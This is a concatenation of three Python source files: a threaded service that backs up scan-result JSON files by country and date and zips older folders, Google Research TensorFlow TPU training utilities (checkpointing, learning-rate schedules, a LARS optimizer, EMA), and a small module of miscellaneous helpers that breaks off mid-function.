self._esinput = None
# 将要备份的数据放到这, 要处理的数据全部放在这里
self._dbu_input = None
self._databack = None
self._zipdata: Path = None
self._zip_size = None
# 备份线程默认为一个,可以在配置里面更改重启
self.backup_thread = 1
self.zip_thread = 1
# 增加一个是否拷贝到ES的功能
self.copy_esinput_enable = True
self._tmp = Path('./tmp')
self._tmp.mkdir(exist_ok=True)
# 文件是否需要拷贝一份到旧索引
self._old_esinput = None
self.config_path = Path(r'./config_path.json')
try:
self._init_cpinfo()
except:
raise Exception(
f"初始化配置参数失败,请检查配置文件\nerror:{traceback.format_exc()}")
# 需要用到的参数
# 文件锁,同一时间只允许一个线程操作文件
self.__file_locker = threading.Lock()
self.__scan_file_locker = threading.Lock()
self._zipfile_locker = threading.Lock()
# 因为压缩可能处理的时间比较长,所以需要增加一个正在压缩的字典
self._zip_dealing = {}
# 根据后缀分配的需要处理的队列,目前只有iscan
self.iscan_task_queue = Queue()
self._zip_queue = Queue()
self.iscan_suffix = '.iscan_search'
# try:
# self._restore_existdata()
# except:
# raise Exception(
# "There's something wrong with restoring the environment")
def _init_cpinfo(self):
"""
初始化配置文件中的路径和参数
:return:
"""
conf_str = self.config_path.read_text(encoding='utf-8')
conf_dict = json.loads(conf_str)
_input = conf_dict.get('data_input')
if not isinstance(_input, str):
raise Exception("Unknown data_input path")
self._input = Path(_input)
self._input.mkdir(exist_ok=True)
print(
f"Start scan data file, input_file_path:{self._input.as_posix()}")
_esinput = conf_dict.get('es_input')
if not isinstance(_esinput, str):
raise Exception("Unknown es_input path")
self._esinput = Path(_esinput)
self._esinput.mkdir(exist_ok=True)
print(f"Save data to ES, es_path:{self._esinput.as_posix()}")
_dbuinput = conf_dict.get('backup_input')
if not isinstance(_dbuinput, str):
raise Exception("Unkown backup_input path")
self._dbu_input = Path(_dbuinput)
self._dbu_input.mkdir(exist_ok=True)
print(f"Data backup process path:{self._dbu_input.as_posix()}")
_databack = conf_dict.get('databackup')
if not isinstance(_databack, str):
raise Exception("Unknown databackup path")
self._databack = Path(_databack)
self._databack.mkdir(exist_ok=True)
print(f"Data save backup path:{self._databack.as_posix()}")
_zipdata = conf_dict.get('zipdata')
if not isinstance(_zipdata, str):
raise Exception("Unkown zipdata path")
self._zipdata = Path(_zipdata)
self._zipdata.mkdir(exist_ok=True)
print(f"Zipdata save path:{self._zipdata.as_posix()}")
_zip_size = conf_dict.get('zip_size')
if not isinstance(_zip_size, int):
raise Exception("Unknown zip_size type")
# 将单位换算成B
self._zip_size = _zip_size * 1024 * 1024
print(f"Zip data size:{_zip_size}MB")
backupthread = conf_dict.get('backup_thread')
if not isinstance(backupthread, int):
raise Exception("Unknown backupthread type")
self.backup_thread = backupthread
zipthread = conf_dict.get('zipdata_thread')
if not isinstance(zipthread, int):
raise Exception("Unknown zipthread type")
self.zip_thread = zipthread
time_limit = conf_dict.get('time_limit')
if not isinstance(time_limit, int):
raise Exception("Unknown time_limit type")
self._backup_interval_time = time_limit * 24 * 60 * 60
print(f"Zip data time expired after {time_limit} days")
# 默认拷贝到ES的功能为开放
copy_esinput_enable = conf_dict.get('copy_to_esinput', True)
self.copy_esinput_enable = copy_esinput_enable
# 拷贝旧索引数据
_old_esinput = conf_dict.get('old_esinput')
if not isinstance(_old_esinput, str):
raise Exception("Unknown old_esinput path")
self._old_esinput = Path(_old_esinput)
self._old_esinput.mkdir(exist_ok=True)
print(f"Save data to old ES, old_espath:{self._esinput.as_posix()}")
def scan_file(self):
"""
扫描输入的文件
根据文件后缀进行分类,将文件放入待处理队列
:return:
"""
while True:
try:
for file in self._input.iterdir():
name = file.name
# 全部移动到tmp目录下去
tmpname = self._tmp / name
# file.replace(tmpname)
with self.__scan_file_locker:
# 这个文件得尽快移动到tmp文件夹,不然下次扫描又会扫描到它就会出问题
shutil.move(file.as_posix(), tmpname.as_posix())
try:
if tmpname.suffix == self.iscan_suffix:
# 只进行复制操作
# source: Path = self._input / name
target: Path = self._dbu_input / name
copyfile(tmpname.as_posix(), target.as_posix())
self.iscan_task_queue.put(target)
print(
f"Backup iscan_search data, filename:{file.as_posix()}")
except:
print(
f'Scan list file error, err:{traceback.format_exc()}')
finally:
# 最后无论如何都需要将文件输出到esinput
if self.copy_esinput_enable:
outname = self._esinput / name
tmpname.replace(outname)
# 一般来说是不会有文件存在的,但是意外不可避免嘛, 所以这里做一个判定,如果还存在文件就删了
if tmpname.exists():
tmpname.unlink()
except:
print(f'Scan task file error, err:{traceback.format_exc()}')
continue
finally:
print("There is no scan data to back up")
time.sleep(0.5)
def _process_file(self, tmpfile: Path):
"""
读取文件里面的数据打开一下,获取到信息后再关上
"""
with tmpfile.open('r', encoding='utf-8') as fp:
j_text = fp.read()
d_text = json.loads(j_text)
# scan_time = d_text.get('time')
# if scan_time is None:
# scan_time = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
try:
country = d_text.get('geoinfo').get('country').get('code')
except:
country = 'UNKNOWN'
return country
def back_file(self):
"""
开始备份数据,先保存到文件夹
当这个文件夹到达一定大小然后压缩保存
:return:
"""
got = False
while True:
got = False
if self.iscan_task_queue.empty():
time.sleep(0.5)
continue
try:
bfile: Path = self.iscan_task_queue.get()
got = True
name = bfile.name
# 现在直接读文件里面的国家和日期
country = self._process_file(bfile)
# 每次保存之前去判断下是否需要修改文件名字并进行压缩备份
date_now_str = datetime.datetime.now().strftime("%Y-%m-%d")
# 新建文件夹的时候需要锁一下,其他时候直接移动即可
with self.__file_locker:
# 先把文件移动过去
dirname: Path = self._databack / country / date_now_str
dirname.mkdir(exist_ok=True, parents=True)
# 移过去的文件名
filename = dirname / name
# 移动到目标文件夹
bfile.replace(filename)
print(
f"Backup file, country:{country}, filename:{name}, date:{date_now_str}")
except:
print(f'Backup file error:\n{traceback.format_exc()}')
finally:
if got:
self.iscan_task_queue.task_done()
def scan_zip_file(self):
"""
压缩文件的线程,每天去扫描一次
将昨天的文件夹压缩到压缩文件夹下
"""
while True:
try:
date_now = datetime.datetime.now().date()
for country in self._databack.iterdir():
if not country.exists():
continue
country_name = country.name
for d_file in country.iterdir():
if self._zip_dealing.__contains__(d_file):
continue
d_name = d_file.name
d_date = datetime.datetime.strptime(
d_name, "%Y-%m-%d").date()
# 如果是今天以前的数据那么就进行压缩
if date_now > d_date:
self._zip_queue.put((d_file, country_name))
with self._zipfile_locker:
# 加入正在处理队列
self._zip_dealing[d_file] = 1
print(
f"A file wait to zip, filename:{d_file.as_posix()}")
except:
print(f"Zip file error:\n{traceback.format_exc()}")
finally:
print("There is no scan data to zip")
time.sleep(3600)
def process_zip_file(self):
"""
压缩今天以前的文件夹
"""
got = False
zipfile_path = None
while True:
got = False
if self._zip_queue.empty():
time.sleep(1)
continue
try:
zipfile_path, country = self._zip_queue.get()
got = True
zip_store_file = self._zipdata / country
zip_store_file.mkdir(exist_ok=True)
zipname = zip_store_file/f"{zipfile_path.name}.zip"
print(
f"Start zipfile, filename:{zipname.as_posix()}")
# 增加一个写入限制
with zipfile.ZipFile(zipname.as_posix(), 'a', zipfile.ZIP_DEFLATED) as write:
for file in zipfile_path.iterdir():
write.write(file.as_posix())
# 写入后删除
file.unlink()
write.close()
# 最后删除已经压缩好的文件夹
zipfile_path.rmdir()
print(
f"Store zipfile success, filename:{zipname.as_posix()}")
except:
print(f"Zip file error:\n{traceback.format_exc()}")
finally:
if got:
self._zip_queue.task_done()
with self._zipfile_locker:
self._zip_dealing.pop(zipfile_path, None)
def start(self):
"""
项目启动
:return:
"""
thread1 = threading.Thread(target=self.scan_file, name="scanfile")
thread1.start()
for i in range(self.backup_thread):
t = threading.Thread(target=self.back_file, name=f"backfile{i}")
t.start()
thread2 = threading.Thread(
target=self.scan_zip_file, name=f"scan_zipfile")
thread2.start()
for j in range(self.zip_thread):
tz = threading.Thread(
target=self.process_zip_file, name=f"zipfile{j}")
tz.start()
if __name__ == "__main__":
scup = ScanBackUP()
scup.start()
|
common_utils.py
|
# coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# pylint: disable=logging-format-interpolation
# pylint: disable=g-direct-tensorflow-import
# pylint: disable=unused-import
r"""Common utils."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import re
import threading
from absl import logging
import numpy as np
import tensorflow.compat.v1 as tf
def get_worker_name(worker_id):
"""Returns `/job:tpu_worker/task:{worker_id}`."""
return f'/job:tpu_worker/task:{worker_id}'
def get_device_name(worker_id, core_id):
"""Returns `/job:tpu_worker/task:{worker_id}/device:tpu:{core_id}`."""
return f'/job:tpu_worker/task:{worker_id}/device:TPU:{core_id}'
def count_flops(model, params):
"""Count the number of flops."""
g = tf.Graph()
with g.as_default():
x = tf.placeholder(
dtype=tf.bfloat16 if params.use_bfloat16 else tf.float32,
shape=[1, params.image_size, params.image_size, 3])
_ = model(x, training=False)
options = tf.profiler.ProfileOptionBuilder.float_operation()
profile_out = tf.profiler.profile(graph=g, cmd='op', options=options)
return profile_out.total_float_ops
def count_params():
"""Count model params."""
num_params = sum([np.prod([d.value for d in w.shape])
for w in tf.trainable_variables()
if 'teacher' not in w.name.lower()])
return num_params
def strip_var_name(var_name):
"""Strips variable name of sub-strings blocking variable name matching.
Removes sub-strings that should be ignored when matching checkpointed variable
names to variable names in the training graph, namely:
- trailing colon + number, e.g. "W:0" --> "W"
- partitioning info., e.g. "/a/part_12/b" --> "a/b".
(Note that checkpointed variables do not have partitioning info in their name,
while model variables do).
Args:
var_name: str, variable name.
Returns:
stripped variable name.
"""
# Strip trailing number, e.g. convert "lstm/W_0:0" to "lstm/W_0".
var_name = re.sub(r':\d+$', '', var_name)
# Strip partitioning info, e.g. convert "W_0/part_3/Adagrad" to "W_0/Adagrad".
var_name = re.sub(r'/part_\d+', '', var_name)
return var_name
def get_saver(max_to_keep=1, restore_ema=False):
"""Constructs a `Saver`."""
var_list = {}
if restore_ema:
logging.info('Restore EMA values')
for v in tf.global_variables():
if v.name.startswith('ema'):
logging.fatal(f'wrong ema var name `{v.name}`')
if 'global_step' in v.name:
var_list['global_step'] = v
else:
var_list['ema/' + strip_var_name(v.name)] = v
else:
for v in tf.global_variables():
var_list[strip_var_name(v.name)] = v
saver = tf.train.Saver(var_list,
max_to_keep=max_to_keep,
save_relative_paths=True)
return saver
class AsyncCheckpoint(object):
"""Saves checkpoint using a separated thread."""
def __init__(self, saver, ckpt_dir, max_to_keep=None):
self._saver = saver
self._ckpt_dir = ckpt_dir
self._max_to_keep = max_to_keep
self._thread = None
self.latest_checkpoint = None
def join(self):
if self._thread is not None:
self._thread.join()
def save(self, sess, step):
"""Docs."""
def _save_fn():
"""Run the saver process."""
raw_sess = sess if isinstance(sess, tf.Session) else sess.raw_session()
ckpt_path = self._saver.save(
raw_sess,
save_path=os.path.join(self._ckpt_dir, 'ckpt'),
global_step=step,
write_meta_graph=False,
write_state=False)
self.latest_checkpoint = ckpt_path[len(self._ckpt_dir) + 1:]
logging.info(f'Saved checkpoint `{ckpt_path}`')
all_checkpoints = get_all_checkpoints(self._ckpt_dir)
assert all_checkpoints is not None
new_ckpt_content = [f'model_checkpoint_path: "{all_checkpoints[-1]}"']
if (self._max_to_keep is not None and
self._max_to_keep < len(all_checkpoints)):
pattern = all_checkpoints[0] + '*'
gfile.BulkDelete(gfile.Glob(pattern))
# pylint: disable=invalid-unary-operand-type
all_checkpoints = all_checkpoints[-self._max_to_keep:]
# pylint: enable=invalid-unary-operand-type
for ckpt_name in all_checkpoints:
new_ckpt_content.append(f'all_model_checkpoint_paths: "{ckpt_name}"')
checkpoint_file = os.path.join(self._ckpt_dir, 'checkpoint')
with gfile.GFile(checkpoint_file, 'w') as fout:
fout.write('\n'.join(new_ckpt_content))
if self._thread is not None:
self._thread.join(timeout=0.1)
if self._thread.is_alive():
logging.info('Saver thread still in progress, skipping checkpoint.')
return
self._thread = threading.Thread(target=_save_fn)
self._thread.start()
def should_log(params):
"""Returns a Boolean `tf.Tensor` dictating whether we should log values."""
global_step = tf.train.get_or_create_global_step()
first_run = tf.equal(global_step, 1)
log_every = tf.equal(tf.floormod(global_step, params.log_every), 0)
return tf.logical_or(first_run, log_every)
def get_all_checkpoints(ckpt_dir):
"""Returns a list of all checkpoints, eg `['ckpt-100', 'ckpt-500']`."""
if not gfile.IsDirectory(ckpt_dir):
return []
pattern = ckpt_dir + '/ckpt-*'
s = len(ckpt_dir) + len('/ckpt-')
checkpoints = [int(f.split('.')[0][s:]) for f in gfile.Glob(pattern)]
checkpoints = [os.path.join(ckpt_dir, 'ckpt-{0}'.format(v))
for v in sorted(set(checkpoints))]
return checkpoints
def get_latest_checkpoint(ckpt_dir):
"""Returns a list of all checkpoints, eg `['ckpt-100', 'ckpt-500']`."""
all_checkpoints = get_all_checkpoints(ckpt_dir)
all_checkpoints = [ckpt for ckpt in all_checkpoints if 'temp' not in ckpt]
if all_checkpoints:
return all_checkpoints[-1]
else:
return None
def get_outfeed_ops(params, signature):
"""Create TPU outfeed ops."""
outfeed_dtypes, outfeed_shapes = [], []
for dtype, shape in signature.values():
outfeed_dtypes.append(dtype)
outfeed_shapes.append(shape)
outfeed_ops = []
outfeed_graph = tf.Graph()
dev_assign = params.device_assignment
host_to_tpus = {}
for replica_id in range(params.num_replicas):
host_device = dev_assign.host_device(
replica=replica_id, logical_core=params.num_cores_per_replica-1)
tpu_ordinal = dev_assign.tpu_ordinal(
replica=replica_id, logical_core=params.num_cores_per_replica-1)
if host_device not in host_to_tpus:
host_to_tpus[host_device] = [tpu_ordinal]
else:
assert tpu_ordinal not in host_to_tpus[host_device]
host_to_tpus[host_device].append(tpu_ordinal)
with outfeed_graph.as_default():
for host, tpus in host_to_tpus.items():
with tf.device(host):
for device_ordinal in tpus:
device_outfeed = tf.raw_ops.OutfeedDequeueTuple(
dtypes=outfeed_dtypes,
shapes=outfeed_shapes,
device_ordinal=device_ordinal)
outfeed_ops.append(device_outfeed)
return outfeed_ops, outfeed_graph
class InfeedThread(object):
"""InfeedTread wrapper."""
def __init__(self, params, infeed_ops, infeed_graphs, name='infeed_thread'):
if infeed_graphs is not None:
assert isinstance(infeed_graphs, list)
assert len(infeed_graphs) == len(infeed_ops)
self.infeed_ops = infeed_ops
self.infeed_graphs = infeed_graphs
self.sessions = []
for g in infeed_graphs:
with g.as_default():
sess = tf.Session(target=params.master, graph=g)
self.sessions.append(sess)
self.name = name
self._threads = []
def stop(self):
self.join()
for sess in self.sessions:
sess.close()
def join(self):
for thread in self._threads:
if thread is not None:
thread.join(timeout=0.1)
del thread
def start(self, verbose=False):
"""Docs."""
if verbose:
logging.info(f'Start thread for `{self.name}`')
def _infeed_fn(sess, infeed_op, infeed_graph):
"""Run the infeed process."""
with infeed_graph.as_default():
sess.run(infeed_op)
for sess, op, g in zip(self.sessions, self.infeed_ops, self.infeed_graphs):
thread = threading.Thread(target=_infeed_fn, args=(sess, op, g))
thread.daemon = True
thread.start()
self._threads.append(thread)
class OutfeedThread(object):
"""OutfeedThread wrapper."""
def __init__(self, params, outfeed_ops, outfeed_graph, outfeed_signature,
name='outfeed_thread'):
self.params = params
self.outfeed_ops = outfeed_ops
self.outfeed_graph = outfeed_graph
self.outfeed_signature = outfeed_signature
with outfeed_graph.as_default():
self.session = tf.Session(target=params.master, graph=outfeed_graph)
self.name = name
self._thread = None
def join(self):
if self._thread is not None:
self._thread.join(timeout=0.1)
self._thread = None
self.session.close()
def start(self, verbose=False):
"""Docs."""
if verbose:
logging.info(f'Start thread for `{self.name}`')
if self._thread is not None:
return
params = self.params
outfeed_signature = self.outfeed_signature
def _outfeed_fn():
"""Read from `outfeed_dequeue` and write `Summary`."""
train_logdir = os.path.join(params.output_dir, 'logs', 'train')
summary_writer = tf.summary.FileWriter(train_logdir)
summary_tags = list(outfeed_signature.keys())
while True:
outfeeds = self.session.run(self.outfeed_ops)
outfeeds = np.array(outfeeds).reshape([params.num_replicas, -1])
outfeeds = np.sum(outfeeds, axis=0).tolist()
summary_values = []
for tag, value in zip(summary_tags, outfeeds):
if tag == 'global_step':
value /= params.num_replicas
step = value
else:
summary_values.append(tf.Summary.Value(tag=tag, simple_value=value))
summary_writer.add_summary(tf.Summary(value=summary_values), step)
summary_writer.flush()
if step >= params.num_train_steps:
summary_writer.close()
break
self._thread = threading.Thread(target=_outfeed_fn)
self._thread.daemon = True
self._thread.start()
def setup_ema(params, name_scope=None):
"""Create exponential moving average for all variables under `name_scope`."""
logging.info(f'ema_decay with rate {params.ema_decay}')
all_vars = tf.global_variables()
ema_ops = []
step = tf.cast(tf.train.get_or_create_global_step() - params.ema_start,
tf.float32)
decay = 1. - tf.minimum(params.ema_decay, (step+1.) / (step+10.))
decay = tf.cond(tf.train.get_or_create_global_step() < params.ema_start,
lambda: tf.constant(1, tf.float32), lambda: decay)
def should_skip(v):
key_words = ['momentum', 'rms', 'global_step', 'debug', 'adam', 'lars']
conditions = [k in v.name.lower() for k in key_words]
if name_scope is not None:
conditions += [not v.name.lower().startswith(name_scope)]
return any(conditions)
def get_init(v_name):
key_words = ['variance', 'beta']
if any([k in v_name for k in key_words]):
return tf.initializers.ones()
return tf.initializers.zeros()
with tf.variable_scope('ema'):
for v in all_vars:
if not should_skip(v):
v_name = strip_var_name(v.name)
with tf.device(v.device):
ema_var = tf.get_variable(
name=v_name,
shape=v.shape.as_list(),
initializer=get_init(v_name),
trainable=False)
v = shard_weight(v, params.num_cores_per_replica)
ema = shard_weight(ema_var, params.num_cores_per_replica)
ema_op = tf.assign_sub(ema_var, decay * (ema-v), use_locking=True)
ema_ops.append(ema_op)
ema_op = tf.group(*ema_ops)
return ema_op
def get_session(params, isolate_session_state=True):
"""Builds and returns a `tf.Session`."""
config = tf.ConfigProto(
isolate_session_state=isolate_session_state,
allow_soft_placement=True,
graph_options=tf.GraphOptions(
optimizer_options=tf.OptimizerOptions(
opt_level=tf.OptimizerOptions.L0,
do_common_subexpression_elimination=False,
do_function_inlining=False,
do_constant_folding=False)))
return tf.Session(target=params.master, config=config)
def get_learning_rate(params, initial_lr=None, num_warmup_steps=None,
num_wait_steps=None):
"""Build learning rate."""
global_step = tf.train.get_or_create_global_step()
if initial_lr is None:
initial_lr = params.lr
initial_lr = initial_lr * params.train_batch_size / 256.
if num_warmup_steps is None:
num_warmup_steps = params.num_warmup_steps
if num_wait_steps is not None:
global_step = global_step - num_wait_steps
if params.lr_decay_type == 'constant':
lr = tf.constant(initial_lr, dtype=tf.float32)
elif params.lr_decay_type == 'exponential':
lr = tf.train.exponential_decay(
learning_rate=initial_lr,
global_step=global_step-num_warmup_steps,
decay_steps=params.num_decay_steps,
decay_rate=params.lr_decay_rate,
staircase=True)
elif params.lr_decay_type == 'cosine':
if num_wait_steps is None:
lr = tf.train.cosine_decay(
learning_rate=initial_lr,
global_step=global_step-num_warmup_steps,
decay_steps=params.num_train_steps-num_warmup_steps,
alpha=0.0)
else:
lr = tf.train.cosine_decay(
learning_rate=initial_lr,
global_step=global_step-num_warmup_steps,
decay_steps=params.num_train_steps-num_warmup_steps-num_wait_steps,
alpha=0.0)
else:
raise ValueError(f'Unknown lr_decay_type `{params.lr_decay_type}`')
r = (tf.cast(global_step+1, tf.float32) /
tf.cast(num_warmup_steps, tf.float32))
warmup_lr = initial_lr * r
lr = tf.cond(global_step < num_warmup_steps, lambda: warmup_lr, lambda: lr)
if num_wait_steps is not None:
lr = tf.cond(global_step < 0,
lambda: tf.constant(0., tf.float32), lambda: lr)
return lr
def get_optimizer(params, learning_rate=None):
"""Build optimizer."""
if learning_rate is None:
learning_rate = get_learning_rate(params)
if params.optim_type.lower() == 'sgd':
logging.info('Use SGD')
optimizer = tf.train.GradientDescentOptimizer(learning_rate=learning_rate,
use_locking=True)
elif params.optim_type.lower() == 'momentum':
logging.info('Use Momentum')
optimizer = tf.train.MomentumOptimizer(learning_rate=learning_rate,
momentum=0.9,
use_nesterov=True,
use_locking=True)
elif params.optim_type.lower() == 'rmsprop':
optimizer = tf.train.RMSPropOptimizer(learning_rate=learning_rate,
decay=params.rmsprop_rho,
momentum=params.rmsprop_momentum,
epsilon=params.rmsprop_epsilon,
use_locking=True)
elif params.optim_type.lower() == 'lars':
class LARSOptimizer(tf.train.Optimizer):
"""Layer-wise Adaptive Rate Scaling for large batch training.
Introduced by "Large Batch Training of Convolutional Networks" by Y. You,
I. Gitman, and B. Ginsburg. (https://arxiv.org/abs/1708.03888)
Implements the LARS learning rate scheme presented in the paper above.
This optimizer is useful when scaling the batch size to up to 32K without
significant performance degradation. It is recommended to use the
optimizer in conjunction with:
- Gradual learning rate warm-up
- Linear learning rate scaling
- Poly rule learning rate decay
Note, LARS scaling is currently only enabled for dense tensors. Sparse
tensors use the default momentum optimizer.
"""
def __init__(
self,
learning_rate,
momentum=0.9,
weight_decay=0.0001,
# The LARS coefficient is a hyperparameter
eeta=0.001,
epsilon=0.0,
name='LARSOptimizer',
# Enable skipping variables from LARS scaling.
# TODO(sameerkm): Enable a direct mechanism to pass a
# subset of variables to the optimizer.
skip_list=None,
use_nesterov=False):
"""Construct a new LARS Optimizer.
Args:
learning_rate: A `Tensor` or floating point value.
momentum: A floating point value. Momentum hyperparameter.
weight_decay: A floating point value. Weight decay hyperparameter.
eeta: LARS coefficient as used in the paper. Dfault set to LARS
coefficient from the paper. (eeta / weight_decay) determines the
highest scaling factor in LARS.
epsilon: Optional epsilon parameter to be set in models that have very
small gradients. Default set to 0.0.
name: Optional name prefix for variables and ops created.
skip_list: List of strings to enable skipping variables from scaling.
If any of the strings in skip_list is a subset of var.name, variable
'var' is skipped from LARS scaling. For a typical classification
model with batch normalization, the skip_list is
['batch_normalization', 'bias']
use_nesterov: when set to True, nesterov momentum will be enabled
Raises:
ValueError: If a hyperparameter is set to a non-sensical value.
"""
if momentum < 0.0:
raise ValueError(f'momentum should be positive: {momentum}')
if weight_decay < 0.0:
raise ValueError(f'weight_decay should be positive: {weight_decay}')
super(LARSOptimizer, self).__init__(use_locking=False, name=name)
self._learning_rate = learning_rate
self._momentum = momentum
self._weight_decay = weight_decay
self._eeta = eeta
self._epsilon = epsilon
self._name = name
self._skip_list = skip_list
self._use_nesterov = use_nesterov
def _create_slots(self, var_list):
for v in var_list:
self._zeros_slot(v, 'momentum', self._name)
def compute_lr(self, grad, var):
scaled_lr = self._learning_rate
if self._skip_list is None or not any(v in var.name
for v in self._skip_list):
w_norm = tf.norm(var, ord=2)
g_norm = tf.norm(grad, ord=2)
trust_ratio = tf.where(
tf.math.greater(w_norm, 0),
tf.where(
tf.math.greater(g_norm, 0),
(self._eeta * w_norm / (
g_norm + self._weight_decay * w_norm + self._epsilon)),
1.0),
1.0)
scaled_lr = self._learning_rate * trust_ratio
# Add the weight regularization gradient
grad = grad + self._weight_decay * var
return scaled_lr, grad
def _apply_dense(self, grad, var):
scaled_lr, grad = self.compute_lr(grad, var)
mom = self.get_slot(var, 'momentum')
return tf.raw_ops.ApplyMomentum(
var,
mom,
tf.cast(1.0, var.dtype.base_dtype),
grad * scaled_lr,
self._momentum,
use_locking=False,
use_nesterov=self._use_nesterov)
def _resource_apply_dense(self, grad, var):
scaled_lr, grad = self.compute_lr(grad, var)
mom = self.get_slot(var, 'momentum')
return tf.raw_ops.ResourceApplyMomentum(
var=var.handle,
accum=mom.handle,
lr=tf.cast(1.0, var.dtype.base_dtype),
grad=grad * scaled_lr,
momentum=self._momentum,
use_locking=False,
use_nesterov=self._use_nesterov)
# Fallback to momentum optimizer for sparse tensors
def _apply_sparse(self, grad, var):
mom = self.get_slot(var, 'momentum')
return tf.raw_ops.SparseApplyMomentum(
var,
mom,
tf.cast(self._learning_rate_tensor, var.dtype.base_dtype),
grad.values,
grad.indices,
tf.cast(self._momentum_tensor, var.dtype.base_dtype),
use_locking=self._use_locking,
use_nesterov=self._use_nesterov).op
def _resource_apply_sparse(self, grad, var, indices):
mom = self.get_slot(var, 'momentum')
return tf.raw_ops.ResourceSparseApplyMomentum(
var.handle,
mom.handle,
tf.cast(self._learning_rate_tensor, grad.dtype),
grad,
indices,
tf.cast(self._momentum_tensor, grad.dtype),
use_locking=self._use_locking,
use_nesterov=self._use_nesterov)
def _prepare(self):
learning_rate = self._learning_rate
if callable(learning_rate):
learning_rate = learning_rate()
self._learning_rate_tensor = tf.convert_to_tensor(
learning_rate, name='learning_rate')
momentum = self._momentum
if callable(momentum):
momentum = momentum()
self._momentum_tensor = tf.convert_to_tensor(momentum, name='momentum')
optimizer = LARSOptimizer(
learning_rate=learning_rate,
weight_decay=params.weight_decay,
skip_list=['batch_norm', 'batchnorm', 'gamma', 'beta', 'bias'],
use_nesterov=True)
else:
raise ValueError(f'Unknown optim_type `{params.optim_type}`')
return learning_rate, optimizer
def get_l2_loss(excluded_keywords=None):
"""Traverse `tf.trainable_variables` compute L2 reg. Ignore `batch_norm`."""
def _is_excluded(v):
"""Guess whether a variable belongs to `batch_norm`."""
keywords = ['batchnorm', 'batch_norm', 'bn',
'layernorm', 'layer_norm']
if excluded_keywords is not None:
keywords += excluded_keywords
return any([k in v.name.lower() for k in keywords])
l2_losses = [tf.nn.l2_loss(v) for v in tf.trainable_variables()
if not _is_excluded(v)]
return tf.add_n(l2_losses)
def add_weight_decay(params, variables, gradients):
"""Add the gradients of `weight_decay` to existing `gradients`."""
def should_skip_(v):
"""Guess whether a variable belongs to `batch_norm`."""
keywords = ['batchnorm', 'batch_norm', 'bn', 'layer_norm', 'layernorm']
return any([k in v.name.lower() for k in keywords])
reg_gradients = []
for v, g in zip(variables, gradients):
with tf.device(v.device):
if g is not None:
g = tf.tpu.cross_replica_sum(g)
if should_skip_(v):
reg_gradients.append(g)
else:
if params.use_xla_sharding:
v = shard_weight(v, params.num_cores_per_replica)
if g is None:
reg_gradients.append(tf.stop_gradient(v) * params.weight_decay)
else:
reg_gradients.append(g + tf.stop_gradient(v) * params.weight_decay)
return reg_gradients
def clip_batch_norm_grads(variables, gradients, grad_bound=0.1):
"""Add the gradients of `weight_decay` to existing `gradients`."""
clipped_gradients = []
for v, g in zip(variables, gradients):
v_name = v.name.lower()
with tf.device(v.device):
if g is not None and ('beta' in v_name or 'gamma' in v_name):
g = tf.clip_by_value(g, -grad_bound, grad_bound)
clipped_gradients.append(g)
return clipped_gradients
def shard_weight(w, num_cores):
"""Apply XLA sharding to a weight `w`."""
del num_cores
return w
def shard_tensor(x, num_cores):
"""Apply XLA sharding to a tensor `x`."""
del num_cores
return x
|
em_utils.py
|
"""
Contains some misc utility functions
"""
import collections
import multiprocessing
from collections import OrderedDict, Callable
from functools import reduce
import numpy as np
def as_list(obj):
"""
Makes sure `obj` is a list or otherwise converts it to a list with a single element.
:param obj:
:return: A `list`
"""
return obj if isinstance(obj, list) else [obj]
def maybe_call(obj, *args, **kwargs):
"""
Calls obj with args and kwargs and return its result if obj is callable, otherwise returns obj.
"""
if callable(obj):
return obj(*args, **kwargs)
return obj
def as_tuple_or_list(obj):
"""
Make sure that `obj` is a tuple or a list and eventually converts it into a list with a single element
:param obj:
:return: A `tuple` or a `list`
"""
return obj if isinstance(obj, (list, tuple)) else [obj]
def maybe_get(obj, i):
return obj[i] if hasattr(obj, "__getitem__") else obj
def merge_dicts(*dicts):
return reduce(lambda a, nd: {**a, **nd}, dicts, {})
def flatten_list(lst):
from itertools import chain
return list(chain(*lst))
def filter_vars(var_name, scope):
import tensorflow as tf
return [
v
for v in tf.get_collection(
tf.GraphKeys.GLOBAL_VARIABLES,
scope=scope.name if hasattr(scope, "name") else scope,
)
if v.name.endswith("%s:0" % var_name)
]
def name_from_vars(var_dict, *vars_):
"""
Unfortunately this method doesn't return a very specific name....It gets a little messy
:param var_dict:
:param vars_:
:return:
"""
new_k_v = {}
for v in vars_:
for k, vv in var_dict.items():
if v == vv:
new_k_v[k] = v
return name_from_dict(new_k_v)
def name_from_dict(_dict, *exclude_names):
string_dict = {str(k): str(v) for k, v in _dict.items() if k not in exclude_names}
return _tf_string_replace("_".join(flatten_list(list(sorted(string_dict.items())))))
def _tf_string_replace(_str):
"""
Replace chars that are not accepted by tensorflow namings (eg. variable_scope)
:param _str:
:return:
"""
return (
_str.replace("[", "p")
.replace("]", "q")
.replace(",", "c")
.replace("(", "p")
.replace(")", "q")
.replace(" ", "")
)
def namedtuple_with_defaults(typename, field_names, default_values=()):
T = collections.namedtuple(typename, field_names)
T.__new__.__defaults__ = (None,) * len(T._fields)
if isinstance(default_values, collections.Mapping):
prototype = T(**default_values)
else:
prototype = T(*default_values)
T.__new__.__defaults__ = tuple(prototype)
return T
def get_rand_state(rand):
"""
Utility methods for getting a `RandomState` object.
:param rand: rand can be None (new State will be generated),
np.random.RandomState (it will be returned) or an integer (will be treated as seed).
:return: a `RandomState` object
"""
if isinstance(rand, np.random.RandomState):
return rand
elif isinstance(rand, (int, np.ndarray, list)) or rand is None:
return np.random.RandomState(rand)
else:
raise ValueError("parameter rand {} has wrong type".format(rand))
def GPU_CONFIG():
import tensorflow as tf
CONFIG_GPU_GROWTH = tf.ConfigProto(allow_soft_placement=True)
CONFIG_GPU_GROWTH.gpu_options.allow_growth = True
return CONFIG_GPU_GROWTH
# SOME SCORING UTILS FUNCTIONS
half_int = lambda _m: 1.96 * np.std(_m) / np.sqrt(len(_m) - 1)
def mean_std_ci(measures, mul=1.0, tex=False):
"""
Computes mean, standard deviation and 95% half-confidence interval for a list of measures.
:param measures: list
